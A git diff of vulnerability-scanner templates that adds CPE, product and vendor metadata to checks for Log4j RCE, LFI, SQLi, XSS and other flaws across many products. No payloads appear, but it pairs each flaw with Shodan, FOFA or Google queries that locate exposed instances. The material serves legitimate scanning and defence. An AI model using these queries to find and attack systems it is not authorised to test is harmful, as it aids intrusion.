kingsoft tags: kingsoft,vgm,lfi + classification: + cpe: cpe:2.3:a:kingsoft:kingsoft_antivirus:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml index 9b5eab301c..1cb7f80e57 100644 --- a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml +++ b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml @@ -12,8 +12,12 @@ info: metadata: max-request: 1 shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337 + product: kiwi_tcms + vendor: kiwitcms tags: kiwitcms,exposure,misconfig,hackerone + classification: + cpe: cpe:2.3:a:kiwitcms:kiwi_tcms:*:*:*:*:*:*:*:* http: - raw: - | @@ -44,4 +48,4 @@ http: part: body json: - .result[].username -# digest: 4a0a00473045022100e625a29f9198b07723d4e26329a8d2d947c7240aadf04e2859b0f6dff1acdead02200b19f7aac7e79222c4418add2934c0704dab1ee621e7b45540127028968ed156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e625a29f9198b07723d4e26329a8d2d947c7240aadf04e2859b0f6dff1acdead02200b19f7aac7e79222c4418add2934c0704dab1ee621e7b45540127028968ed156:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/landray-oa-datajson-rce.yaml b/http/vulnerabilities/other/landray-oa-datajson-rce.yaml index 4c9eb461da..8009b379ca 100644 --- a/http/vulnerabilities/other/landray-oa-datajson-rce.yaml +++ b/http/vulnerabilities/other/landray-oa-datajson-rce.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 1 fofa-query: app="Landray-OA系统" + product: landray_office_automation + vendor: landray tags: landray,rce,oast + classification: + cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/other/logstash-log4j-rce.yaml b/http/vulnerabilities/other/logstash-log4j-rce.yaml index 8c96db8249..b582cb4091 100644 --- a/http/vulnerabilities/other/logstash-log4j-rce.yaml +++ b/http/vulnerabilities/other/logstash-log4j-rce.yaml @@ -13,9 +13,12 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:elastic:logstash:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"logstash" + product: logstash + vendor: elastic tags: cve,cve2021,rce,jndi,log4j,logstash,oast,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/manage-engine-dc-log4j-rce.yaml b/http/vulnerabilities/other/manage-engine-dc-log4j-rce.yaml index 68f7871503..a0e686915e 100644 --- a/http/vulnerabilities/other/manage-engine-dc-log4j-rce.yaml +++ b/http/vulnerabilities/other/manage-engine-dc-log4j-rce.yaml @@ -13,9 +13,12 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"ManageEngine Desktop Central" + product: manageengine_desktop_central + vendor: zohocorp tags: cve,cve2021,rce,jndi,log4j,manage,engine,oast,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/nacos-auth-bypass.yaml b/http/vulnerabilities/other/nacos-auth-bypass.yaml index 79629ab76c..23e9ae3523 100644 --- a/http/vulnerabilities/other/nacos-auth-bypass.yaml +++ b/http/vulnerabilities/other/nacos-auth-bypass.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 2 fofa-query: app="NACOS" + product: nacos + vendor: alibaba tags: nacos,auth-bypass + classification: + cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/other/ncast-lfi.yaml b/http/vulnerabilities/other/ncast-lfi.yaml index d55cd79e99..a811570c7e 100644 --- a/http/vulnerabilities/other/ncast-lfi.yaml +++ b/http/vulnerabilities/other/ncast-lfi.yaml @@ -12,8 +12,12 @@ info: fofa-query: app="Ncast-产品" && title=="高清智能录播系统" verified: true max-request: 1 + product: ncast + vendor: ncast_project tags: ncast,lfi + classification: + cpe: cpe:2.3:a:ncast_project:ncast:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c3ccb20d4d2894d7ad538e05b308dd310907922254ad4c9bda70fdb35a4209de02202ed3f40e27ef9ae92809083d6a8f7df2d7dc1c0cf4c9c7cb8cde61b8717159ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c3ccb20d4d2894d7ad538e05b308dd310907922254ad4c9bda70fdb35a4209de02202ed3f40e27ef9ae92809083d6a8f7df2d7dc1c0cf4c9c7cb8cde61b8717159ff:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/nextjs-redirect.yaml b/http/vulnerabilities/other/nextjs-redirect.yaml index 46103b2dc7..6aeb5f7b9e 100644 --- a/http/vulnerabilities/other/nextjs-redirect.yaml +++ b/http/vulnerabilities/other/nextjs-redirect.yaml @@ -13,9 +13,12 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 + cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"/_next/static" + product: next.js + vendor: zeit tags: redirect,nextjs,xss http: @@ -33,4 +36,4 @@ http: - type: status status: - 308 -# digest: 4a0a0047304502205cea4e717c7c2a70efdf78bbfdc71c7003cd0e55f055d264c130cd4adf52bf1e022100e235d5d012538e5f42ebf9eb3091963591b6fc3ac472866adcf48c7d07fc469f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205cea4e717c7c2a70efdf78bbfdc71c7003cd0e55f055d264c130cd4adf52bf1e022100e235d5d012538e5f42ebf9eb3091963591b6fc3ac472866adcf48c7d07fc469f:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/ns-asg-file-read.yaml b/http/vulnerabilities/other/ns-asg-file-read.yaml index e5ce7500fe..6526589ff1 100644 --- a/http/vulnerabilities/other/ns-asg-file-read.yaml +++ b/http/vulnerabilities/other/ns-asg-file-read.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + cpe: cpe:2.3:h:netentsec:ns-asg:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.title:“NS-ASG” fofa-query: app="网康科技-NS-ASG安全网关" + product: ns-asg + vendor: netentsec tags: nsasg,lfi http: diff --git a/http/vulnerabilities/other/opencart-core-sqli.yaml b/http/vulnerabilities/other/opencart-core-sqli.yaml index da09428ffe..80e8ecf99f 100644 --- a/http/vulnerabilities/other/opencart-core-sqli.yaml +++ b/http/vulnerabilities/other/opencart-core-sqli.yaml @@ -13,7 +13,11 @@ info: max-request: 2 shodan-query: title:"OpenCart" fofa-query: icon_hash="-1443008128" + product: opencart + vendor: opencart tags: opencart,sqli + classification: + cpe: cpe:2.3:a:opencart:opencart:*:*:*:*:*:*:*:* flow: http(1) && http(2) http: @@ -42,4 +46,4 @@ http: - 'contains(body, "Nabb")' - 'status_code == 200' condition: and -# digest: 490a0046304402201bc18f2d15407b5b4d1feec79ec26ec5154c26a4d9bc4a18c47806e834d9a27402207fca97036f9cdf832180fe615db49a2c59459c5752bd17ae36029cd5d8ecb6af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201bc18f2d15407b5b4d1feec79ec26ec5154c26a4d9bc4a18c47806e834d9a27402207fca97036f9cdf832180fe615db49a2c59459c5752bd17ae36029cd5d8ecb6af:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/opencti-lfi.yaml b/http/vulnerabilities/other/opencti-lfi.yaml index add781c0dc..01de7548e0 100644 --- a/http/vulnerabilities/other/opencti-lfi.yaml +++ b/http/vulnerabilities/other/opencti-lfi.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + cpe: cpe:2.3:a:citeum:opencti:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"OpenCTI" + product: opencti + vendor: citeum tags: opencti,lfi,oss http: diff --git a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml index d580373f8c..7988b3dbb3 100644 --- a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml @@ -16,10 +16,13 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:opennms:horizon:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"OpenNMS Web Console" + product: horizon + vendor: opennms tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/openshift-log4j-rce.yaml b/http/vulnerabilities/other/openshift-log4j-rce.yaml index 06b115ee26..4d09c11a6d 100644 --- a/http/vulnerabilities/other/openshift-log4j-rce.yaml +++ b/http/vulnerabilities/other/openshift-log4j-rce.yaml @@ -13,9 +13,12 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:redhat:openshift_origin:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"OpenShift" + product: openshift_origin + vendor: redhat tags: cve,cve2021,rce,jndi,log4j,openshift,oast,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/opensis-lfi.yaml b/http/vulnerabilities/other/opensis-lfi.yaml index 22b050e4b2..7e1a9e01a1 100644 --- a/http/vulnerabilities/other/opensis-lfi.yaml +++ b/http/vulnerabilities/other/opensis-lfi.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + cpe: cpe:2.3:a:os4ed:opensis:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.title:"openSIS" + product: opensis + vendor: os4ed tags: opensis,lfi,edb http: diff --git a/http/vulnerabilities/other/papercut-log4j-rce.yaml b/http/vulnerabilities/other/papercut-log4j-rce.yaml index 2665b9e720..238a76e641 100644 --- a/http/vulnerabilities/other/papercut-log4j-rce.yaml +++ b/http/vulnerabilities/other/papercut-log4j-rce.yaml @@ -13,9 +13,12 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Papercut" + product: papercut_mf + vendor: papercut tags: cve,cve2021,rce,jndi,log4j,papercut,oast,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/parallels-hsphere-xss.yaml b/http/vulnerabilities/other/parallels-hsphere-xss.yaml index 8dec3f5210..8d92be06fc 100644 --- a/http/vulnerabilities/other/parallels-hsphere-xss.yaml +++ b/http/vulnerabilities/other/parallels-hsphere-xss.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + cpe: cpe:2.3:a:parallels:h-sphere:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: title:"h-sphere" + product: h-sphere + vendor: parallels tags: hsphere,xss,edb,parallels http: diff --git a/http/vulnerabilities/other/pega-log4j-rce.yaml b/http/vulnerabilities/other/pega-log4j-rce.yaml index 253aa4cbd3..0765ab3541 100644 --- a/http/vulnerabilities/other/pega-log4j-rce.yaml +++ b/http/vulnerabilities/other/pega-log4j-rce.yaml @@ -13,9 +13,12 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:pega:platform:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: title:"Pega" + product: platform + vendor: pega tags: cve,cve2021,rce,jndi,log4j,pega,oast,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/phpldapadmin-xss.yaml b/http/vulnerabilities/other/phpldapadmin-xss.yaml index e97ef38cbd..93953b3839 100644 --- a/http/vulnerabilities/other/phpldapadmin-xss.yaml +++ b/http/vulnerabilities/other/phpldapadmin-xss.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 9 shodan-query: html:"phpLDAPadmin" + product: phpldapadmin + vendor: phpldapadmin_project tags: php,phpldapadmin,xss + classification: + cpe: cpe:2.3:a:phpldapadmin_project:phpldapadmin:*:*:*:*:*:*:*:* http: - method: GET path: @@ -46,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e27c144b3387000d31b66b220a2ab51cea738f7b9066353b5e5afbf37fbd28e1022046fa83095bb9d286c449a380d9ddc60bfdefc36834bbc36b92b44aadf795d76f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e27c144b3387000d31b66b220a2ab51cea738f7b9066353b5e5afbf37fbd28e1022046fa83095bb9d286c449a380d9ddc60bfdefc36834bbc36b92b44aadf795d76f:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/phpok-sqli.yaml b/http/vulnerabilities/other/phpok-sqli.yaml index 5418e8dfc4..612a22d4de 100644 --- a/http/vulnerabilities/other/phpok-sqli.yaml +++ b/http/vulnerabilities/other/phpok-sqli.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-89 + cpe: cpe:2.3:a:phpok:phpok:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: app="phpok" + product: phpok + vendor: phpok tags: phpok,sqli variables: num: "999999999" diff --git a/http/vulnerabilities/other/quick-cms-sqli.yaml b/http/vulnerabilities/other/quick-cms-sqli.yaml index b9640c6324..22f85898de 100644 --- a/http/vulnerabilities/other/quick-cms-sqli.yaml +++ b/http/vulnerabilities/other/quick-cms-sqli.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 fofa-query: body="Quick.Cms v6.7" + product: quick.cms + vendor: opensolution tags: packetstorm,quickcms,sqli,cms + classification: + cpe: cpe:2.3:a:opensolution:quick.cms:*:*:*:*:*:*:*:* http: - raw: - | @@ -39,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e0516e26a3f113f7baf075eb8ba22bd554e173c1c2e2a50a15bee0e119e29ff4022100bfc6c593c2d9e033481dd30cd15592aa7b431364edf678d51cc9d9c343cf5ecd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e0516e26a3f113f7baf075eb8ba22bd554e173c1c2e2a50a15bee0e119e29ff4022100bfc6c593c2d9e033481dd30cd15592aa7b431364edf678d51cc9d9c343cf5ecd:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/rconfig-file-upload.yaml b/http/vulnerabilities/other/rconfig-file-upload.yaml index 164927a319..7ba9bec298 100644 --- a/http/vulnerabilities/other/rconfig-file-upload.yaml +++ b/http/vulnerabilities/other/rconfig-file-upload.yaml @@ -13,10 +13,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cwe-id: CWE-434 + cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"rConfig" + product: rconfig + vendor: rconfig tags: rconfig,rce,edb,file-upload,instrusive,intrusive http: diff --git a/http/vulnerabilities/other/rundeck-log4j.yaml b/http/vulnerabilities/other/rundeck-log4j.yaml index 47cd914830..02c6ddf7d7 100644 --- a/http/vulnerabilities/other/rundeck-log4j.yaml +++ b/http/vulnerabilities/other/rundeck-log4j.yaml @@ -14,10 +14,13 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:pagerduty:rundeck:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Rundeck" + product: rundeck + vendor: pagerduty tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/seeyon-oa-log4j.yaml b/http/vulnerabilities/other/seeyon-oa-log4j.yaml index d61b982697..1233e2db17 100755 --- a/http/vulnerabilities/other/seeyon-oa-log4j.yaml +++ b/http/vulnerabilities/other/seeyon-oa-log4j.yaml @@ -15,10 +15,13 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: app="致远互联-OA" + product: log4j + vendor: apache tags: cve,cve2021,rce,jndi,log4j,seeyon-oa,kev,oast http: diff --git a/http/vulnerabilities/other/sharp-printers-lfi.yaml b/http/vulnerabilities/other/sharp-printers-lfi.yaml index a618833424..e723bf4250 100644 --- a/http/vulnerabilities/other/sharp-printers-lfi.yaml +++ b/http/vulnerabilities/other/sharp-printers-lfi.yaml @@ -16,8 +16,12 @@ info: verified: true max-request: 1 shodan-query: "Set-Cookie: MFPSESSIONID=" + product: mx-3050v_firmware + vendor: sharp tags: sharp,printer,lfi + classification: + cpe: cpe:2.3:o:sharp:mx-3050v_firmware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100878bae1080c18655ce87b467103626ced8e1c8913101dcd255d13bdbe6416ed702200ff98fbdf4ae214323dc5b259c6e40f09345f7bd46605528276bb867c228ed48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100878bae1080c18655ce87b467103626ced8e1c8913101dcd255d13bdbe6416ed702200ff98fbdf4ae214323dc5b259c6e40f09345f7bd46605528276bb867c228ed48:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/siteminder-dom-xss.yaml b/http/vulnerabilities/other/siteminder-dom-xss.yaml index bc01fa560a..b483e8db5d 100644 --- a/http/vulnerabilities/other/siteminder-dom-xss.yaml +++ b/http/vulnerabilities/other/siteminder-dom-xss.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + cpe: cpe:2.3:a:broadcom:siteminder:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 google-query: inurl:"smpwservices.fcc" + product: siteminder + vendor: broadcom tags: dom,xss,siteminder http: diff --git a/http/vulnerabilities/other/slims-xss.yaml b/http/vulnerabilities/other/slims-xss.yaml index 0dc349a182..b13760eae3 100644 --- a/http/vulnerabilities/other/slims-xss.yaml +++ b/http/vulnerabilities/other/slims-xss.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"SLIMS" + product: senayan_library_management_system + vendor: slims tags: senayan,packetstorm,xss,slims + classification: + cpe: cpe:2.3:a:slims:senayan_library_management_system:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml b/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml index b9ac4253b1..16b3e48dfe 100644 --- a/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml +++ b/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml @@ -12,9 +12,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + cpe: cpe:2.3:a:softneta:meddream_pacs:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login + product: meddream_pacs + vendor: softneta tags: sofneta,lfi,edb http: diff --git a/http/vulnerabilities/other/solarview-compact-xss.yaml b/http/vulnerabilities/other/solarview-compact-xss.yaml index 3d6d0dcc76..e832eaa3f1 100644 --- a/http/vulnerabilities/other/solarview-compact-xss.yaml +++ b/http/vulnerabilities/other/solarview-compact-xss.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + cpe: cpe:2.3:h:contec:solarview_compact:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"SolarView Compact" + product: solarview_compact + vendor: contec tags: xss,solarview,edb http: diff --git a/http/vulnerabilities/other/sonicwall-nsm-log4j-rce.yaml b/http/vulnerabilities/other/sonicwall-nsm-log4j-rce.yaml index 68da0ef778..5180e81e50 100644 --- a/http/vulnerabilities/other/sonicwall-nsm-log4j-rce.yaml +++ b/http/vulnerabilities/other/sonicwall-nsm-log4j-rce.yaml @@ -13,9 +13,12 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:sonicwall:network_security_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"SonicWall Network Security" + product: network_security_manager + vendor: sonicwall tags: cve,cve2021,rce,jndi,log4j,sonicwall,oast,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/splunk-enterprise-log4j-rce.yaml b/http/vulnerabilities/other/splunk-enterprise-log4j-rce.yaml index cdadf5a9cd..1e479fbe98 100644 --- a/http/vulnerabilities/other/splunk-enterprise-log4j-rce.yaml +++ b/http/vulnerabilities/other/splunk-enterprise-log4j-rce.yaml @@ -13,9 +13,12 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Login - Splunk" + product: splunk + vendor: splunk tags: cve,cve2021,rce,jndi,log4j,splunk,oast,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/steve-xss.yaml b/http/vulnerabilities/other/steve-xss.yaml index e405f56232..9f9e8959d8 100644 --- a/http/vulnerabilities/other/steve-xss.yaml +++ b/http/vulnerabilities/other/steve-xss.yaml @@ -12,11 +12,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + cpe: cpe:2.3:a:steve-community:steve:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.title:"SteVe - Steckdosenverwaltung" google-query: intitle:"SteVe - Steckdosenverwaltung" + product: steve + vendor: steve-community tags: steve,xss,oss http: diff --git a/http/vulnerabilities/other/symantec-sepm-log4j-rce.yaml b/http/vulnerabilities/other/symantec-sepm-log4j-rce.yaml index 2c06ac05f8..ff4c4c1e86 100644 --- a/http/vulnerabilities/other/symantec-sepm-log4j-rce.yaml +++ b/http/vulnerabilities/other/symantec-sepm-log4j-rce.yaml @@ -13,9 +13,12 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:symantec:endpoint_protection_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Symantec Endpoint Protection Manager" + product: endpoint_protection_manager + vendor: symantec tags: cve,cve2021,rce,jndi,log4j,symantec,oast,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/tamronos-rce.yaml b/http/vulnerabilities/other/tamronos-rce.yaml index bbda944af1..295616cbab 100644 --- a/http/vulnerabilities/other/tamronos-rce.yaml +++ b/http/vulnerabilities/other/tamronos-rce.yaml @@ -12,11 +12,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-78 + cpe: cpe:2.3:o:tamronos:tamronos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"TamronOS IPTV系统" fofa-query: title="TamronOS IPTV系统" + product: tamronos + vendor: tamronos tags: tamronos,rce http: diff --git a/http/vulnerabilities/other/tekon-info-leak.yaml b/http/vulnerabilities/other/tekon-info-leak.yaml index f9d53707f6..c84e491059 100644 --- a/http/vulnerabilities/other/tekon-info-leak.yaml +++ b/http/vulnerabilities/other/tekon-info-leak.yaml @@ -10,8 +10,12 @@ info: metadata: max-request: 1 shodan-query: title:"контроллер" + product: kio_firmware + vendor: tekon tags: tekon,exposure,unauth + classification: + cpe: cpe:2.3:o:tekon:kio_firmware:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/other/tendat-credential.yaml b/http/vulnerabilities/other/tendat-credential.yaml index 0ca0f0edf6..ddb6e9ecc7 100644 --- a/http/vulnerabilities/other/tendat-credential.yaml +++ b/http/vulnerabilities/other/tendat-credential.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: "title=\"Tenda | LOGIN\" && country=\"CN\"" + product: g0 + vendor: tendacn tags: tendat,exposure,config + classification: + cpe: cpe:2.3:h:tendacn:g0:*:*:*:*:*:*:*:* http: - raw: - | @@ -27,4 +31,4 @@ http: - 'contains(header, "config/conf")' - 'status_code == 200' condition: and -# digest: 4a0a0047304502203ba10e73cf7926fd3191fc939e73a82956db5b16b974060a41ae68acd058c79e0221009c8cc3c80539490789631dde1b5ef173d103159cb4b44b954d5e3067fa800cb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203ba10e73cf7926fd3191fc939e73a82956db5b16b974060a41ae68acd058c79e0221009c8cc3c80539490789631dde1b5ef173d103159cb4b44b954d5e3067fa800cb0:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/thruk-xss.yaml b/http/vulnerabilities/other/thruk-xss.yaml index e1f3cc02b6..457010c7ac 100644 --- a/http/vulnerabilities/other/thruk-xss.yaml +++ b/http/vulnerabilities/other/thruk-xss.yaml @@ -13,10 +13,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + cpe: cpe:2.3:a:thruk:thruk:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"Thruk" + product: thruk + vendor: thruk tags: thruk,xss http: diff --git a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml index f13b08af63..523c3ee2b3 100644 --- a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml +++ b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml @@ -16,10 +16,13 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:ui:unifi_network_application:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"UniFi Network" + product: unifi_network_application + vendor: ui tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/ups-network-lfi.yaml b/http/vulnerabilities/other/ups-network-lfi.yaml index 43cb0acb3c..9d3b9c02a1 100644 --- a/http/vulnerabilities/other/ups-network-lfi.yaml +++ b/http/vulnerabilities/other/ups-network-lfi.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 shodan-query: html:"UPS Network Management Card 4" + product: netman_204_firmware + vendor: riello-ups tags: packetstorm,ups,lfi + classification: + cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220030ad51cd46365526c86d1c114c09d25c8b25e75e4cb8974540a86137d618aa9022100f81c523e69c96d236741b7d852b8ae9b1de9b44cfed01e2e7b7202473e13034e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220030ad51cd46365526c86d1c114c09d25c8b25e75e4cb8974540a86137d618aa9022100f81c523e69c96d236741b7d852b8ae9b1de9b44cfed01e2e7b7202473e13034e:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/voyager-lfi.yaml b/http/vulnerabilities/other/voyager-lfi.yaml index fbf986a2c5..e67f649502 100644 --- a/http/vulnerabilities/other/voyager-lfi.yaml +++ b/http/vulnerabilities/other/voyager-lfi.yaml @@ -11,10 +11,13 @@ info: classification: cvss-score: 7.5 cwe-id: CWE-22 + cpe: cpe:2.3:a:voyager_project:voyager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"voyager-assets" + product: voyager + vendor: voyager_project tags: voyager,lfi http: @@ -37,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c63eefb35a033aa410140b8eb0a820269dd7636f950a8aae7994097a70e80d4c022100eb475dc522e4fb6af94961188a91347ecab596501025105354698b295c16e85d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c63eefb35a033aa410140b8eb0a820269dd7636f950a8aae7994097a70e80d4c022100eb475dc522e4fb6af94961188a91347ecab596501025105354698b295c16e85d:922c64590222798bb761d5b6d8e72950 diff --git 